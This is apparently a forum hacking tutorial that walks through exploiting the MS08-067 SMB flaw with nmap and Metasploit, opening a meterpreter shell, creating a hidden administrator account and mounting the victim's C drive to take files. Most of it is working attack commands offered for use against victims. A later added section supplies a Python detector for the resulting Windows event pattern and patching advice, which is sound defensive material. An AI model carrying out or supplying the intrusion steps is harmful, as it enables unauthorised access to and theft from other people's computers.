Have you ever wondered how you could log in as an Administrator, create your own account and get any files you want from a remote computer? Well, here's how:
Q: On which Windows can the hack be done?
A:
– Windows 2000 SP4
– Windows XP SP1/SP2
– Windows XP Pro x64
– Windows Server 2003 SP1
– Windows Server 2003 x64
Q: From/to what OS are you attacking?
A: We are attacking from Debian Linux to Windows XP SP2.
– We download nmap (nmap.org) so that we can scan the remote PC.
– On the terminal we write: nmap -sS -O <target ip>
– If you see that TCP ports 139 and 445 are open, then everything is exactly as we want it to be.
– Now we download Metasploit (metasploit.org) and we open it via the Terminal.
– Now that Metasploit is running we start the attack.
– We write at the terminal "show exploits" and we get a list of the available exploits.
– We choose the exploit “ms08_067_netapi” by writing “use windows/smb/ms08_067_netapi”
– Now we set RHOST to our victim's IP: "set RHOST <target ip>"
– And RPORT to 445: “set RPORT 445”
– Now we write “set SMBPIPE SRVSVC” and hit ENTER and then “set TARGET 0” and hit ENTER again.
– OK! Let’s set the Payload: “set PAYLOAD windows/meterpreter/bind_tcp”
– IT’S TIME TO HACK THE COMPUTER!!!! Write “exploit” and hit ENTER.
– If everything is OK you should see the following message: "[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:xxxx -> xxx.xxx.xxx.xxx:xxxx)"
– Meterpreter is running. We are inside the target PC!
– Let’s open the target’s CMD: “execute -f cmd.exe -c -H -i”
– If it says “X:\WINDOWS\System32” then the mission is accomplished.
– Now let's create our own admin account.
– Write: “net user n0f4t3 mypass /add”. You should see a confirmation message saying “The command completed successfully.”
– Now let's make the account an admin: "net localgroup administrators n0f4t3 /add".
– You should see again the confirmation message saying: “The command completed successfully.”
– Then type “exit” to exit CMD.
– OMG!! We made it!!! But how can we steal his files?
– We boot into Windows.
– We go to “Start>Run”, we type “cmd” and we hit ENTER.
– Then we write “net use X: \\<target ip>\C mypass /user:n0f4t3” and hit ENTER.
– If that doesn't work, type "net use X: \\<target ip>\C: mypass /user:n0f4t3" and hit ENTER.
– Now go to “My Computer” and you should see a new Drive called X:. Open it and enjoy the victim’s files.
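From a defender's point of view, the steps above leave a distinctive trail in the target's Security log: a local account is created and added to Administrators within minutes, the work is done from a SYSTEM context (the Server service runs as SYSTEM, so the subject of those events is the machine account), and the new account then reaches a share over SMB from a remote address. The script below is an added example written for this page; it is not part of the original tutorial, of Metasploit or of Windows. It runs that correlation over a constructed sample of Security events using the standard event IDs 4720 (user account created), 4732 (member added to a local group) and 5140 (network share accessed); hostnames, times, addresses and the 15-minute window are made-up assumptions.

```python
"""Correlate Windows Security events into alerts for the pattern
"account created -> promoted to Administrators -> used over SMB".
Example code added to this page, not part of the original tutorial."""
from datetime import datetime, timedelta

# Assumed maximum gap between account creation and promotion to Administrators.
WINDOW = timedelta(minutes=15)

# Constructed sample of Security log records (one dict per event).
# 4720 = user account created, 4732 = member added to a security-enabled
# local group, 5140 = network share object accessed. Hosts, names, times
# and the source address are invented for this example.
SAMPLE_EVENTS = [
    {"time": "2009-03-01 22:14:03", "id": 4720, "host": "WS-07",
     "subject": "WS-07$", "target": "n0f4t3"},
    {"time": "2009-03-01 22:14:09", "id": 4732, "host": "WS-07",
     "subject": "WS-07$", "target": "n0f4t3", "group": "Administrators"},
    {"time": "2009-03-01 22:20:41", "id": 5140, "host": "WS-07",
     "subject": "n0f4t3", "share": "\\\\*\\C$", "src_ip": "192.0.2.10"},
    # Benign helpdesk activity: a new user added to a non-admin group hours later.
    {"time": "2009-03-02 09:05:00", "id": 4720, "host": "WS-12",
     "subject": "helpdesk", "target": "jsmith"},
    {"time": "2009-03-02 11:30:00", "id": 4732, "host": "WS-12",
     "subject": "helpdesk", "target": "jsmith", "group": "Remote Desktop Users"},
]


def _ts(value):
    """Parse the timestamp format used in the sample records."""
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S")


def find_suspicious_admin_accounts(events, window=WINDOW):
    """Return one alert per local account that was created (4720) and then
    added to Administrators (4732) on the same host within `window`.

    Each alert records whether the creating subject was a machine account
    (work done as SYSTEM, which is what a service exploit yields) and any
    later share access (5140) by the new account from the network."""
    ordered = sorted(events, key=lambda e: _ts(e["time"]))
    created = {}  # (host, account) -> the 4720 event
    alerts = []
    for event in ordered:
        if event["id"] == 4720:
            created[(event["host"], event["target"])] = event
        elif event["id"] == 4732 and event.get("group") == "Administrators":
            origin = created.get((event["host"], event["target"]))
            if origin and _ts(event["time"]) - _ts(origin["time"]) <= window:
                alerts.append({
                    "host": event["host"],
                    "account": event["target"],
                    "created_at": origin["time"],
                    "promoted_at": event["time"],
                    "by_system": origin["subject"].endswith("$"),
                    "share_access": [],
                })
        elif event["id"] == 5140:
            # Attach later remote share use to an existing alert for that account.
            for alert in alerts:
                if alert["host"] == event["host"] and alert["account"] == event["subject"]:
                    alert["share_access"].append(
                        (event["time"], event["src_ip"], event["share"]))
    return alerts


def format_alert(alert):
    """Render one alert as a single human-readable line."""
    who = "SYSTEM/machine account" if alert["by_system"] else "a user account"
    line = (f"{alert['host']}: account {alert['account']} created {alert['created_at']} "
            f"by {who}, promoted to Administrators {alert['promoted_at']}")
    for when, src, share in alert["share_access"]:
        line += f"; share {share} accessed from {src} at {when}"
    return line


if __name__ == "__main__":
    for a in find_suspicious_admin_accounts(SAMPLE_EVENTS):
        print(format_alert(a))
```

Only the WS-07 sequence is reported; the helpdesk account on WS-12 is not, because it went into a non-administrative group. A real deployment would read these fields out of the event XML rather than from dicts, but the correlation is the same. Detection is a backstop here: the root cause is a host that is missing the MS08-067 fix and exposes TCP 445 to untrusted networks, and patching plus blocking that port at the perimeter removes the opening the tutorial relies on.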
That’s all Folks!!!
Thanks to:
– Microsoft for this great exploit!!
– Metasploit and Nmap.
– Me (N0F@T3) for writing this tut.
– MinSteRexS for posting an update!